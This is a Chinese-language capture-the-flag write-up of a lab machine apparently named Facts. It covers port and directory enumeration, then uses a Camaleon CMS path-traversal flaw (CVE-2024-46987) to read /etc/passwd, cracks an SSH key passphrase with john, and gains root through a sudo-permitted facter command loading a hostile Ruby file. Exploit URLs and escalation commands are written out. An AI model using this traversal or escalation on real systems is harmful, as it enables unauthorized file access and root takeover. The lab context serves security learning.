本文介绍了如何利用CVE-2024-46987漏洞,通过合法用户名和密码登录Camaleon CMS的后台,读取服务器上的任意文件,包括提取/etc/passwd和用户的SSH私钥。利用提取的SSH私钥成功登录用户trivia,接着通过sudo权限执行facter命令获取root权限。文章详细记录了信息收集、漏洞利用、用户权限提升的整个过程,并总结了所学到的经验教训。
Information Gathering
枚举目标端口
# Nmap 7.98 scan initiated Tue Feb 3 17:24:47 2026 as: /usr/lib/nmap/nmap -p 22,80,54321 -sC -sV -Pn -n -oN scan_results/nmap_details.txt 10.129.195.109
Nmap scan report for 10.129.195.109
Host is up (0.077s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.9p1 Ubuntu 3ubuntu3.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4d:d7:b2:8c:d4:df:57:9c:a4:2f:df:c6:e3:01:29:89 (ECDSA)
|_ 256 a3:ad:6b:2f:4a:bf:6f:48:ac:81:b9:45:3f:de:fb:87 (ED25519)
80/tcp open http nginx 1.26.3 (Ubuntu)
|_http-title: Did not follow redirect to http://facts.htb/
|_http-server-header: nginx/1.26.3 (Ubuntu)
54321/tcp open http Golang net/http server
|_http-title: Did not follow redirect to http://10.129.195.109:9001
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 400 Bad Request
| Accept-Ranges: bytes
| Content-Length: 303
| Content-Type: application/xml
| Server: MinIO
| Strict-Transport-Security: max-age=31536000; includeSubDomains
| Vary: Origin
| X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
| X-Amz-Request-Id: 1890CC8123C34797
| X-Content-Type-Options: nosniff
| X-Xss-Protection: 1; mode=block
| Date: Tue, 03 Feb 2026 17:25:08 GMT
| <?xml version="1.0" encoding="UTF-8"?>
| <Error><Code>InvalidRequest</Code><Message>Invalid Request (invalid argument)</Message><Resource>/nice ports,/Trinity.txt.bak</Resource><RequestId>1890CC8123C34797</RequestId><HostId>dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8</HostId></Error>
| GenericLines, Help, RTSPRequest, SSLSessionReq:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 400 Bad Request
| Accept-Ranges: bytes
| Content-Length: 276
| Content-Type: application/xml
| Server: MinIO
| Strict-Transport-Security: max-age=31536000; includeSubDomains
| Vary: Origin
| X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
| X-Amz-Request-Id: 1890CC7D5A0C80F5
| X-Content-Type-Options: nosniff
| X-Xss-Protection: 1; mode=block
| Date: Tue, 03 Feb 2026 17:24:52 GMT
| <?xml version="1.0" encoding="UTF-8"?>
| <Error><Code>InvalidRequest</Code><Message>Invalid Request (invalid argument)</Message><Resource>/</Resource><RequestId>1890CC7D5A0C80F5</RequestId><HostId>dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8</HostId></Error>
| HTTPOptions:
| HTTP/1.0 200 OK
| Vary: Origin
| Date: Tue, 03 Feb 2026 17:24:52 GMT
|_ Content-Length: 0
|_http-server-header: MinIO80端口运行camaleon_cms
54321端口可能是一个api
枚举80端口
➜ Facts ffuf -u http://facts.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt -mc 302
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://facts.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 302
________________________________________________
admin [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 1587ms]
admin.cgi [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 1573ms]
admin.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 1547ms]
admin.pl [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 1529ms]登录管理员界面可以注册进入
进入后可以看到 Camaleon CMS Version 2.9.0
搜索发现其是CVE-2024-46987
CVE-2024-46987
该漏洞是使用合法的用户名和密码登录后台,然后利用漏洞读取服务器上的任意文件,其中admin/media/download_private_file存在路径遍历
访问http://facts.htb/admin/media/download_private_file?file=../../../../../../../../etc/passwd即可获取目标的passwd
得到两个用户
trivia:x:1000:1000:facts.htb:/home/trivia:/bin/bash
william:x:1001:1001::/home/william:/bin/bashwilliam的没有得到
Exploitation (User Flag)
ssh登录
➜ Facts ssh -i id_ed25519 trivia@10.129.195.109
The authenticity of host '10.129.195.109 (10.129.195.109)' can't be established.
ED25519 key fingerprint is: SHA256:fygAnw6lqDbeHg2Y7cs39viVqxkQ6XKE0gkBD95fEzA
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.195.109' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_ed25519':使用john破解
ssh2john id_ed25519 > trivia-hash
john trivia-hash -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 24 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
dragonballz (id_ed25519)
1g 0:00:01:49 DONE (2026-02-03 18:07) 0.009164g/s 29.32p/s 29.32c/s 29.32C/s grecia..imissu
Use the "--show" option to display all of the cracked passwords reliably
Session completed.ssh登录时输入密码dragonballz即可
Privilege Escalation (Root Flag)
trivia@facts:/home/william$ sudo -l
Matching Defaults entries for trivia on facts:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User trivia may run the following commands on facts:
(ALL) NOPASSWD: /usr/bin/facter根据搜索发现他会执行指定目录下的第一个.rb程序
echo 'exec("/bin/bash")' > /tmp/root.rbsudo /usr/bin/facter --custom-dir /tmp即可获取root